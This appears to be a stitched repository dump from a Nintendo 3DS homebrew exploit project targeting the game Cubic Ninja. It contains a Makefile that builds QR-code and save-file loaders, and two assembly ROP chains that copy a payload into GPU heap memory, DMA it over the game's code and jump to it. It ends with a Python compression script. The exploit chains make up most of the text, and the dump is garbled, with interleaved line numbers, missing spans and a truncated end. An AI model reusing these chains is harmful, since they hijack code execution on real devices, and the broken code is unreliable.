cn_qr_initial_loader/cn_qr_initial_loader.bin.png cn_save_initial_loader/cn_save_initial_loader.bin cn_secondary_payload/cn_secondary_payload.bin cn_bootloader/cn_bootloader.bin menu_payload/menu_payload_regionfree.bin menu_payload/menu_payload_loadropbin.bin menu_payload/menu_ropbin.bin 59 | 60 | all: directories build/constants $(QRCODE_TARGET0) p/$(OUTNAME).bin $(QRCODE_TARGET1) 61 | directories: 62 | @mkdir -p build && mkdir -p build/cro 63 | @mkdir -p p 64 | @mkdir -p q 65 | 66 | 
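# Home-menu versions for which a ROP database is ported from the 17415
# prototype database (menu_ropdb/17415_proto/ropdb.txt).
MENU_ROPDB_VERSIONS := 11272 12288 13330 15360 16404 17415 19456 20480_usa

# Regenerate every per-version ropdb.txt with scripts/portRopDb.py.
# The menu_<version>_code.bin inputs are read from the current directory and
# are not produced by any rule in this span.
# `set -e` stops at the first failing command, as the one-command-per-line
# recipe did.
menu_ropdb:
	@set -e; for v in $(MENU_ROPDB_VERSIONS); do \
		mkdir -p menu_ropdb/$$v; \
	done
	@set -e; for v in $(MENU_ROPDB_VERSIONS); do \
		echo "building ropDB for menu version $$v..."; \
		python $(SCRIPTS)/portRopDb.py menu_17415_code.bin menu_$${v}_code.bin 0x00100000 \
			menu_ropdb/17415_proto/ropdb.txt menu_ropdb/$$v/ropdb.txt; \
	done

# Final artifacts, named after the selected firmware / CN / menu versions.
q/$(OUTNAME).png: build/cn_qr_initial_loader.bin.png
	@cp $< $@

p/$(OUTNAME).bin: $(PAYLOAD_SRCPATH)
	@cp $< $@

# Constant tables are produced by the sub-directory makefiles.
# $(MAKE) is used instead of a bare `make` so that command-line flags and the
# jobserver reach the sub-make.
firm_constants/constants.txt:
	@$(MAKE) -C firm_constants
cn_constants/constants.txt:
	@$(MAKE) -C cn_constants
menu_ropdb/ropdb.txt:
	@$(MAKE) -C menu_ropdb

# NOTE(review): the version variables are expanded unquoted into the command
# line, so they are expected to be plain tokens (e.g. WEST, 4096); an empty
# one shifts the positional arguments seen by makeHeaders.py.
build/constants: firm_constants/constants.txt cn_constants/constants.txt menu_ropdb/ropdb.txt
	@python $(SCRIPTS)/makeHeaders.py $(FIRMVERSION) $(CNVERSION) $(SPIDERVERSION) $(ROVERSION) $(MENUVERSION) $@ $^

build/cn_qr_initial_loader.bin.png: cn_qr_initial_loader/cn_qr_initial_loader.bin.png
	@cp $< $@
cn_qr_initial_loader/cn_qr_initial_loader.bin.png:
	@$(MAKE) -C cn_qr_initial_loader


build/cn_save_initial_loader.bin: cn_save_initial_loader/cn_save_initial_loader.bin
	@cp $< $@
cn_save_initial_loader/cn_save_initial_loader.bin:
	@$(MAKE) -C cn_save_initial_loader


# blowfish.py takes the input file, the output file and the scripts directory.
build/cn_secondary_payload.bin: cn_secondary_payload/cn_secondary_payload.bin
	@python $(SCRIPTS)/blowfish.py $< $@ scripts
# Stage the embedded binaries into cn_secondary_payload/data, then build it.
# $(QRCODE_TARGET1_CMD) and $(ROPBIN_CMD0) expand to nothing when OTHERAPP is
# set or LOADROPBIN is unset, respectively.
cn_secondary_payload/cn_secondary_payload.bin: $(QRCODE_TARGET1) build/menu_payload_regionfree.bin build/menu_payload_loadropbin.bin build/menu_ropbin.bin
	@mkdir -p cn_secondary_payload/data
	$(QRCODE_TARGET1_CMD)
	@cp build/menu_payload_regionfree.bin cn_secondary_payload/data/
	@cp build/menu_payload_loadropbin.bin cn_secondary_payload/data/
	$(ROPBIN_CMD0)
	@$(MAKE) -C cn_secondary_payload

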
build/menu_payload_regionfree.bin build/menu_payload_loadropbin.bin build/menu_ropbin.bin: menu_payload/menu_payload_regionfree.bin menu_payload/menu_payload_loadropbin.bin menu_payload/menu_ropbin.bin 132 | @cp menu_payload/menu_payload_regionfree.bin build/ 133 | @cp menu_payload/menu_payload_loadropbin.bin build/ 134 | $(ROPBIN_CMD1) 135 | menu_payload/menu_payload_regionfree.bin menu_payload/menu_payload_loadropbin.bin menu_payload/menu_ropbin.bin: 136 | @cd menu_payload && make 137 | 138 | 139 | clean: 140 | @rm -rf build/* 141 | @cd firm_constants && make clean 142 | @cd cn_constants && make clean 143 | @cd menu_ropdb && make clean 144 | @cd cn_qr_initial_loader && make clean 145 | @cd cn_save_initial_loader && make clean 146 | @cd cn_secondary_payload && make clean 147 | @cd menu_payload && make clean 148 | @echo "all cleaned up !" 149 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/sploit.s: -------------------------------------------------------------------------------- 1 | .nds 2 | 3 | .include "../../build/constants.s" 4 | 5 | .open "sploit_proto.bin","cn_save_initial_loader.bin",0x0 6 | 7 | .arm 8 | 9 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000) 10 | CN_TMPVAR_ADR equ (CN_GSPHEAP+0x000E0000) 11 | 12 | ;length 13 | .orga 0x60 14 | .word endROP-ROP+0xA8-0x64 15 | ; .word secondaryROP-ROP+0xA8-0x64 16 | 17 | ;ROP 18 | .orga 0xA8 19 | ROP: 20 | ;jump to safer place 21 | 22 | .word 0x002d2b18 ; pop {r0, pc} 23 | .word 0x0FFFFF28 ; r0 24 | .word 0x00272738 ; ldr r0, [r0] | pop {r4, pc} 25 | .word CN_TMPVAR_ADR ; r4 (tmp var adr) 26 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 27 | .word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset) 28 | .word 0x001e5ab0 ; add r0, r0, r4 | pop {r4, pc} 29 | .word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage) 30 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 31 | .word 0xDEADC0DE ; r4 (garbage) 32 | .word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop 
{pc} 33 | filePayloadOffset: 34 | .word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget) 35 | 36 | secondaryROP: 37 | 38 | ;copy code to GSP heap 39 | .word 0x001742ec ; pop {r3, pc} 40 | .word 0x002d2b18 ; r3 (pop {r0, pc}) 41 | .word 0x00106ee8 ; pop {r4, lr} | bx r3 42 | .word 0xDEADC0DE ; r4 (garbage) 43 | .word 0x002d2b18 ; lr (pop {r0, pc}) 44 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 45 | .word CN_TMPVAR_ADR-4 ; r0 (tmp var) 46 | .word 0x00271df8 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc} 47 | .word 0xDEADC0DE ; r3 (garbage) 48 | .word 0xDEADC0DE ; r4 (garbage) 49 | .word 0xDEADC0DE ; r5 (garbage) 50 | .word 0x002d2b18 ; pop {r0, pc} 51 | .word CN_CODELOCATIONGSP-codePatch ; r0 (dst) 52 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 53 | .word codePatchEnd ; r2 (size) 54 | .word 0xDEADC0DE ; r3 (garbage) 55 | .word 0xDEADC0DE ; r4 (garbage) 56 | .word 0x00229B38 ; memcpy (ends in BX LR) 57 | 58 | ;flush data cache 59 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 60 | .word CN_GSPHANDLE_ADR ; r0 (handle ptr) 61 | .word 0x0022b2bc ; pop {r1, pc} 62 | .word 0xFFFF8001 ; r1 (kprocess handle) 63 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 64 | .word CN_CODELOCATIONGSP ; r2 (address) 65 | ; .word codePatchEnd-codePatch ; r3 (size) ; beware cache flushing trouble... 
66 | .word 0x00010000 ; r3 (size) 67 | .word 0xDEADC0DE ; r4 (garbage) 68 | .word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD SP!, {R4-R6,PC}) 69 | .word 0xDEADC0DE ; r4 (garbage) 70 | .word 0xDEADC0DE ; r5 (garbage) 71 | .word 0xDEADC0DE ; r6 (garbage) 72 | 73 | ;create GX command 74 | .word 0x0027273C ; pop {r4, pc} 75 | 76 | .word CN_GXCOMMAND_ADR+0x0 ; r4 77 | .word 0x002d2b18 ; pop {r0, pc} 78 | .word 0x00000004 79 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 80 | 81 | .word CN_GXCOMMAND_ADR+0x4 ; r4 82 | .word 0x002d2b18 ; pop {r0, pc} 83 | .word CN_CODELOCATIONGSP 84 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 85 | 86 | .word CN_GXCOMMAND_ADR+0x8 ; r4 87 | .word 0x002d2b18 ; pop {r0, pc} 88 | .word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0 89 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 90 | 91 | .word CN_GXCOMMAND_ADR+0xC ; r4 92 | .word 0x002d2b18 ; pop {r0, pc} 93 | .word 0x00010000 94 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 95 | 96 | .word CN_GXCOMMAND_ADR+0x10 ; r4 97 | .word 0x002d2b18 ; pop {r0, pc} 98 | .word 0x00000000 99 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 100 | 101 | .word CN_GXCOMMAND_ADR+0x14 ; r4 102 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 103 | 104 | .word CN_GXCOMMAND_ADR+0x18 ; r4 105 | .word 0x002d2b18 ; pop {r0, pc} 106 | .word 0x00000008 107 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 108 | 109 | .word CN_GXCOMMAND_ADR+0x1C ; r4 110 | .word 0x002d2b18 ; pop {r0, pc} 111 | .word 0x00000000 112 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 113 | .word 0xDEADC0DE ; r4 (garbage) 114 | 115 | ;send GX command 116 | .word 0x002d2b18 ; pop {r0, pc} 117 | .word CN_GSPSHAREDBUF_ADR ; r0 118 | .word 0x0022b2bc ; pop {r1, pc} 119 | .word CN_GXCOMMAND_ADR ; r1 (cmd addr) 120 | .word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD SP!, {R4-R8,PC}) 121 | .word 0xDEADC0DE ; r4 
(garbage) 122 | .word 0xDEADC0DE ; r5 (garbage) 123 | .word 0xDEADC0DE ; r6 (garbage) 124 | .word 0xDEADC0DE ; r7 (garbage) 125 | .word 0xDEADC0DE ; r8 (garbage) 126 | 127 | ;sleep for a second and jump to code 128 | .word 0x001742ec ; pop {r3, pc} 129 | .word 0x002d2b18 ; r3 (pop {r0, pc}) 130 | .word 0x00106ee8 ; pop {r4, lr} | bx r3 131 | .word 0xDEADC0DE ; r4 (garbage) 132 | .word 0x002d2b18 ; lr (pop {r0, pc}) 133 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 134 | .word 0x3B9ACA00 ; r0 = 1 second 135 | ; .word 0xFFFFFFFF ; r0 = forever 136 | .word 0x0022b2bc ; pop {r1, pc} 137 | .word 0x00000000 ; r1 138 | ; .word 0x0FFFFFFF ; r1 = forever 139 | .word 0x0029D7DC ; svcSleepThread (ends in BX LR) 140 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 141 | .word 0x00000000 ; r0 (time_low) 142 | .word 0x0022b2bc ; pop {r1, pc} 143 | .word 0x00000000 ; r1 (time_high) 144 | 145 | ; DEBUG ! 146 | ;copy garbage to framebuffer 147 | .word 0x002d2b18 ; pop {r0, pc} 148 | .word CN_TOPFBADR1 ; r0 (dst) 149 | .word 0x0022b2bc ; pop {r1, pc} 150 | .word CN_CODELOCATIONGSP ; r1 (src) 151 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 152 | .word 0x46500 ; r2 (size) 153 | .word 0xDEADC0DE ; r3 (garbage) 154 | .word 0xDEADC0DE ; r4 (garbage) 155 | .word 0x00229B38 ; memcpy (ends in BX LR) 156 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 157 | .word 0xDEADC0DE ; r0 (garbage) 158 | 159 | ;copy garbage to framebuffer 160 | .word 0x002d2b18 ; pop {r0, pc} 161 | .word CN_TOPFBADR2 ; r0 (dst) 162 | .word 0x0022b2bc ; pop {r1, pc} 163 | .word CN_CODELOCATIONGSP ; r1 (src) 164 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 165 | .word 0x46500 ; r2 (size) 166 | .word 0xDEADC0DE ; r3 (garbage) 167 | .word 0xDEADC0DE ; r4 (garbage) 168 | .word 0x00229B38 ; memcpy (ends in BX LR) 169 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 170 | .word 0xDEADC0DE ; r0 (garbage) 171 | 172 | ;copy garbage to framebuffer 173 | .word 0x002d2b18 ; pop {r0, pc} 174 | .word CN_TOPFBADR1+0x46500/2 ; r0 (dst) 
175 | .word 0x0022b2bc ; pop {r1, pc} 176 | .word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src) 177 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 178 | .word 0x46500/2 ; r2 (size) 179 | .word 0xDEADC0DE ; r3 (garbage) 180 | .word 0xDEADC0DE ; r4 (garbage) 181 | .word 0x00229B38 ; memcpy (ends in BX LR) 182 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 183 | .word 0xDEADC0DE ; r0 (garbage) 184 | 185 | ;copy garbage to framebuffer 186 | .word 0x002d2b18 ; pop {r0, pc} 187 | .word CN_TOPFBADR2+0x46500/2 ; r0 (dst) 188 | .word 0x0022b2bc ; pop {r1, pc} 189 | .word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src) 190 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 191 | .word 0x46500/2 ; r2 (size) 192 | .word 0xDEADC0DE ; r3 (garbage) 193 | .word 0xDEADC0DE ; r4 (garbage) 194 | .word 0x00229B38 ; memcpy (ends in BX LR) 195 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 196 | .word 0xDEADC0DE ; r0 (garbage) 197 | 198 | .word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code 199 | 200 | .word 0xBEEF0000 201 | endROP: 202 | 203 | .align 4 204 | codePatch: 205 | .incbin "cn_initial/cn_initial.bin" 206 | codePatchEnd: 207 | 208 | .Close 209 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/sploit.s: -------------------------------------------------------------------------------- 1 | .nds 2 | 3 | .include "../../build/constants.s" 4 | 5 | .open "sploit_proto.bin","cn_qr_initial_loader.bin",0x0 6 | 7 | .arm 8 | 9 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000) 10 | CN_TMPVAR_ADR equ (CN_GSPHEAP+0x000E0000) 11 | 12 | ;length 13 | .orga 0x60 14 | .word endROP-ROP+0xA8-0x64 15 | ; .word secondaryROP-ROP+0xA8-0x64 16 | 17 | ;ROP 18 | .orga 0xA8 19 | ROP: 20 | ;jump to safer place 21 | 22 | .word 0x002d2b18 ; pop {r0, pc} 23 | .word 0x0FFFE368 ; r0 24 | .word 0x00272738 ; ldr r0, [r0] | pop {r4, pc} 25 | .word 0x00000008 ; r4 26 | .word 0x001e5ab0 ; add r0, r0, r4 | pop {r4, pc} 27 | .word 0xDEADC0DE ; r4 (garbage) 28 | .word 0x00272738 ; 
ldr r0, [r0] | pop {r4, pc} 29 | .word CN_TMPVAR_ADR ; r4 (tmp var adr) 30 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 31 | .word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset) 32 | .word 0x001e5ab0 ; add r0, r0, r4 | pop {r4, pc} 33 | .word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage) 34 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 35 | .word 0xDEADC0DE ; r4 (garbage) 36 | .word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop {pc} 37 | filePayloadOffset: 38 | .word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget) 39 | 40 | secondaryROP: 41 | 42 | ;copy code to GSP heap 43 | .word 0x001742ec ; pop {r3, pc} 44 | .word 0x002d2b18 ; r3 (pop {r0, pc}) 45 | .word 0x00106ee8 ; pop {r4, lr} | bx r3 46 | .word 0xDEADC0DE ; r4 (garbage) 47 | .word 0x002d2b18 ; lr (pop {r0, pc}) 48 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 49 | .word CN_TMPVAR_ADR-4 ; r0 (tmp var) 50 | .word 0x00271df8 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc} 51 | .word 0xDEADC0DE ; r3 (garbage) 52 | .word 0xDEADC0DE ; r4 (garbage) 53 | .word 0xDEADC0DE ; r5 (garbage) 54 | .word 0x002d2b18 ; pop {r0, pc} 55 | .word CN_CODELOCATIONGSP-codePatch ; r0 (dst) 56 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 57 | .word codePatchEnd ; r2 (size) 58 | .word 0xDEADC0DE ; r3 (garbage) 59 | .word 0xDEADC0DE ; r4 (garbage) 60 | .word 0x00229B38 ; memcpy (ends in BX LR) 61 | 62 | ;flush data cache 63 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 64 | .word CN_GSPHANDLE_ADR ; r0 (handle ptr) 65 | .word 0x0022b2bc ; pop {r1, pc} 66 | .word 0xFFFF8001 ; r1 (kprocess handle) 67 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 68 | .word CN_CODELOCATIONGSP ; r2 (address) 69 | ; .word codePatchEnd-codePatch ; r3 (size) ; beware cache flushing trouble... 
70 | .word 0x00010000 ; r3 (size) 71 | .word 0xDEADC0DE ; r4 (garbage) 72 | .word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD SP!, {R4-R6,PC}) 73 | .word 0xDEADC0DE ; r4 (garbage) 74 | .word 0xDEADC0DE ; r5 (garbage) 75 | .word 0xDEADC0DE ; r6 (garbage) 76 | 77 | ;create GX command 78 | .word 0x0027273C ; pop {r4, pc} 79 | 80 | .word CN_GXCOMMAND_ADR+0x0 ; r4 81 | .word 0x002d2b18 ; pop {r0, pc} 82 | .word 0x00000004 83 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 84 | 85 | .word CN_GXCOMMAND_ADR+0x4 ; r4 86 | .word 0x002d2b18 ; pop {r0, pc} 87 | .word CN_CODELOCATIONGSP 88 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 89 | 90 | .word CN_GXCOMMAND_ADR+0x8 ; r4 91 | .word 0x002d2b18 ; pop {r0, pc} 92 | .word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0 93 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 94 | 95 | .word CN_GXCOMMAND_ADR+0xC ; r4 96 | .word 0x002d2b18 ; pop {r0, pc} 97 | .word 0x00010000 98 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 99 | 100 | .word CN_GXCOMMAND_ADR+0x10 ; r4 101 | .word 0x002d2b18 ; pop {r0, pc} 102 | .word 0x00000000 103 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 104 | 105 | .word CN_GXCOMMAND_ADR+0x14 ; r4 106 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 107 | 108 | .word CN_GXCOMMAND_ADR+0x18 ; r4 109 | .word 0x002d2b18 ; pop {r0, pc} 110 | .word 0x00000008 111 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 112 | 113 | .word CN_GXCOMMAND_ADR+0x1C ; r4 114 | .word 0x002d2b18 ; pop {r0, pc} 115 | .word 0x00000000 116 | .word 0x0020096c ; str r0, [r4] | pop {r4, pc} 117 | .word 0xDEADC0DE ; r4 (garbage) 118 | 119 | ;send GX command 120 | .word 0x002d2b18 ; pop {r0, pc} 121 | .word CN_GSPSHAREDBUF_ADR ; r0 122 | .word 0x0022b2bc ; pop {r1, pc} 123 | .word CN_GXCOMMAND_ADR ; r1 (cmd addr) 124 | .word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD SP!, {R4-R8,PC}) 125 | .word 0xDEADC0DE ; r4 
(garbage) 126 | .word 0xDEADC0DE ; r5 (garbage) 127 | .word 0xDEADC0DE ; r6 (garbage) 128 | .word 0xDEADC0DE ; r7 (garbage) 129 | .word 0xDEADC0DE ; r8 (garbage) 130 | 131 | ;sleep for a second and jump to code 132 | .word 0x001742ec ; pop {r3, pc} 133 | .word 0x002d2b18 ; r3 (pop {r0, pc}) 134 | .word 0x00106ee8 ; pop {r4, lr} | bx r3 135 | .word 0xDEADC0DE ; r4 (garbage) 136 | .word 0x002d2b18 ; lr (pop {r0, pc}) 137 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 138 | .word 0x3B9ACA00 ; r0 = 1 second 139 | ; .word 0xFFFFFFFF ; r0 = forever 140 | .word 0x0022b2bc ; pop {r1, pc} 141 | .word 0x00000000 ; r1 142 | ; .word 0x0FFFFFFF ; r1 = forever 143 | .word 0x0029D7DC ; svcSleepThread (ends in BX LR) 144 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 145 | .word 0x00000000 ; r0 (time_low) 146 | .word 0x0022b2bc ; pop {r1, pc} 147 | .word 0x00000000 ; r1 (time_high) 148 | 149 | ; DEBUG ! 150 | ;copy garbage to framebuffer 151 | .word 0x002d2b18 ; pop {r0, pc} 152 | .word CN_TOPFBADR1 ; r0 (dst) 153 | .word 0x0022b2bc ; pop {r1, pc} 154 | .word CN_CODELOCATIONGSP ; r1 (src) 155 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 156 | .word 0x46500 ; r2 (size) 157 | .word 0xDEADC0DE ; r3 (garbage) 158 | .word 0xDEADC0DE ; r4 (garbage) 159 | .word 0x00229B38 ; memcpy (ends in BX LR) 160 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 161 | .word 0xDEADC0DE ; r0 (garbage) 162 | 163 | ;copy garbage to framebuffer 164 | .word 0x002d2b18 ; pop {r0, pc} 165 | .word CN_TOPFBADR2 ; r0 (dst) 166 | .word 0x0022b2bc ; pop {r1, pc} 167 | .word CN_CODELOCATIONGSP ; r1 (src) 168 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 169 | .word 0x46500 ; r2 (size) 170 | .word 0xDEADC0DE ; r3 (garbage) 171 | .word 0xDEADC0DE ; r4 (garbage) 172 | .word 0x00229B38 ; memcpy (ends in BX LR) 173 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 174 | .word 0xDEADC0DE ; r0 (garbage) 175 | 176 | ;copy garbage to framebuffer 177 | .word 0x002d2b18 ; pop {r0, pc} 178 | .word CN_TOPFBADR1+0x46500/2 ; r0 (dst) 
179 | .word 0x0022b2bc ; pop {r1, pc} 180 | .word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src) 181 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 182 | .word 0x46500/2 ; r2 (size) 183 | .word 0xDEADC0DE ; r3 (garbage) 184 | .word 0xDEADC0DE ; r4 (garbage) 185 | .word 0x00229B38 ; memcpy (ends in BX LR) 186 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 187 | .word 0xDEADC0DE ; r0 (garbage) 188 | 189 | ;copy garbage to framebuffer 190 | .word 0x002d2b18 ; pop {r0, pc} 191 | .word CN_TOPFBADR2+0x46500/2 ; r0 (dst) 192 | .word 0x0022b2bc ; pop {r1, pc} 193 | .word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src) 194 | .word 0x0010fc14 ; pop {r2, r3, r4, pc} 195 | .word 0x46500/2 ; r2 (size) 196 | .word 0xDEADC0DE ; r3 (garbage) 197 | .word 0xDEADC0DE ; r4 (garbage) 198 | .word 0x00229B38 ; memcpy (ends in BX LR) 199 | ;equivalent to .word 0x002d2b18 ; pop {r0, pc} 200 | .word 0xDEADC0DE ; r0 (garbage) 201 | 202 | .word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code 203 | 204 | .word 0xBEEF0000 205 | endROP: 206 | 207 | .align 4 208 | codePatch: 209 | .incbin "cn_initial/cn_initial.bin" 210 | .word 0xDEADDEAD 211 | .word 0xDEADDEAD 212 | .word 0xDEADDEAD 213 | .word 0xDEADDEAD 214 | codePatchEnd: 215 | 216 | .Close 217 | -------------------------------------------------------------------------------- /scripts/compress.py: -------------------------------------------------------------------------------- 1 | # used http://code.google.com/p/u-lzss/source/browse/trunk/js/lib/ulzss.js as 2 | # a guide 3 | from sys import stderr 4 | 5 | from collections import defaultdict 6 | from operator import itemgetter 7 | from struct import pack, unpack 8 | 9 | class SlidingWindow: 10 | # The size of the sliding window 11 | size = 4096 12 | 13 | # The minimum displacement. 14 | disp_min = 2 15 | 16 | # The hard minimum ; a disp less than this can't be represented in the 17 | # compressed stream. 
18 | disp_start = 1 19 | 20 | # The minimum length for a successful match in the window 21 | match_min = 1 22 | 23 | # The maximum length of a successful match, inclusive. 24 | match_max = None 25 | 26 | def __init__(self, buf): 27 | self.data = buf 28 | self.hash = defaultdict(list) 29 | self.full = False 30 | 31 | self.start = 0 32 | self.stop = 0 33 | #self.index = self.disp_min - 1 34 | self.index = 0 35 | 36 | assert self.match_max is not None 37 | 38 | def next(self): 39 | if self.index < self.disp_start - 1: 40 | self.index += 1 41 | return 42 | 43 | if self.full: 44 | olditem = self.data[self.start] 45 | assert self.hash[olditem][0] == self.start 46 | self.hash[olditem].pop(0) 47 | 48 | item = self.data[self.stop] 49 | self.hash[item].append(self.stop) 50 | self.stop += 1 51 | self.index += 1 52 | 53 | if self.full: 54 | self.start += 1 55 | else: 56 | if self.size <= self.stop: 57 | self.full = True 58 | 59 | def advance(self, n=1): 60 | """Advance the window by n bytes""" 61 | for _ in range(n): 62 | self.next() 63 | 64 | def search(self): 65 | match_max = self.match_max 66 | match_min = self.match_min 67 | 68 | counts = [] 69 | indices = self.hash[self.data[self.index]] 70 | for i in indices: 71 | matchlen = self.match(i, self.index) 72 | if matchlen >= match_min: 73 | disp = self.index - i 74 | #assert self.index - disp >= 0 75 | #assert self.disp_min <= disp < self.size + self.disp_min 76 | if self.disp_min <= disp: 77 | counts.append((matchlen, -disp)) 78 | if matchlen >= match_max: 79 | #assert matchlen == match_max 80 | return counts[-1] 81 | 82 | if counts: 83 | match = max(counts, key=itemgetter(0)) 84 | return match 85 | 86 | return None 87 | 88 | def match(self, start, bufstart): 89 | size = self.index - start 90 | 91 | if size == 0: 92 | return 0 93 | 94 | matchlen = 0 95 | it = range(min(len(self.data) - bufstart, self.match_max)) 96 | for i in it: 97 | if self.data[start + (i % size)] == self.data[bufstart + i]: 98 | matchlen += 1 99 | else: 
100 | break 101 | return matchlen 102 | 103 | class NLZ10Window(SlidingWindow): 104 | size = 4096 105 | 106 | match_min = 3 107 | match_max = 3 + 0xf 108 | 109 | class NLZ11Window(SlidingWindow): 110 | size = 4096 111 | 112 | match_min = 3 113 | match_max = 0x111 + 0xFFFF 114 | 115 | class NOverlayWindow(NLZ10Window): 116 | disp_min = 3 117 | 118 | def _compress(input, windowclass=NLZ10Window): 119 | """Generates a stream of tokens. Either a byte (int) or a tuple of (count, 120 | displacement).""" 121 | 122 | window = windowclass(input) 123 | 124 | i = 0 125 | while True: 126 | if len(input) <= i: 127 | break 128 | match = window.search() 129 | if match: 130 | yield match 131 | #if match[1] == -283: 132 | # raise Exception(match, i) 133 | window.advance(match[0]) 134 | i += match[0] 135 | else: 136 | yield input[i] 137 | window.next() 138 | i += 1 139 | 140 | def packflags(flags): 141 | n = 0 142 | for i in range(8): 143 | n <<= 1 144 | try: 145 | if flags[i]: 146 | n |= 1 147 | except IndexError: 148 | pass 149 | return n 150 | 151 | def chunkit(it, n): 152 | buf = [] 153 | for x in it: 154 | buf.append(x) 155 | if n <= len(buf): 156 | yield buf 157 | buf = [] 158 | if buf: 159 | yield buf 160 | 161 | def compress(input, out): 162 | # header 163 | out.write(pack("B", packflags(flags))) 170 | 171 | for t in tokens: 172 | if type(t) == tuple: 173 | count, disp = t 174 | count -= 3 175 | disp = (-disp) - 1 176 | assert 0 <= disp < 4096 177 | sh = (count << 12) | disp 178 | out.write(pack(">H", sh)) 179 | else: 180 | out.write(pack(">B", t)) 181 | 182 | length += 1 183 | length += sum(2 if f else 1 for f in flags) 184 | 185 | # padding 186 | padding = 8 - ((length+7+4) % 8) 187 | if padding: 188 | out.write(b'\x00' * padding) 189 | # # padding 190 | # padding = 4 - (length % 4 or 4) 191 | # if padding: 192 | # out.write(b'\xff' * padding) 193 | 194 | return padding 195 | 196 | def compress_nlz11(input, out): 197 | # header 198 | out.write(pack("B", packflags(flags))) 
205 | length += 1 206 | 207 | for t in tokens: 208 | if type(t) == tuple: 209 | count, disp = t 210 | disp = (-disp) - 1 211 | #if disp == 282: 212 | # raise Exception 213 | assert 0 <= disp <= 0xFFF 214 | if count <= 1 + 0xF: 215 | count -= 1 216 | assert 2 <= count <= 0xF 217 | sh = (count << 12) | disp 218 | out.write(pack(">H", sh)) 219 | length += 2 220 | elif count <= 0x11 + 0xFF: 221 | count -= 0x11 222 | assert 0 <= count <= 0xFF 223 | b = count >> 4 224 | sh = ((count & 0xF) << 12) | disp 225 | out.write(pack(">BH", b, sh)) 226 | length += 3 227 | elif count <= 0x111 + 0xFFFF: 228 | count -= 0x111 229 | assert 0 <= count <= 0xFFFF 230 | l = (1 << 28) | (count << 12) | disp 231 | out.write(pack(">L", l)) 232 | length += 4 233 | else: 234 | raise ValueError(count) 235 | else: 236 | out.write(pack(">B", t)) 237 | length += 1 238 | 239 | # padding 240 | padding = 4 - (length % 4 or 4) 241 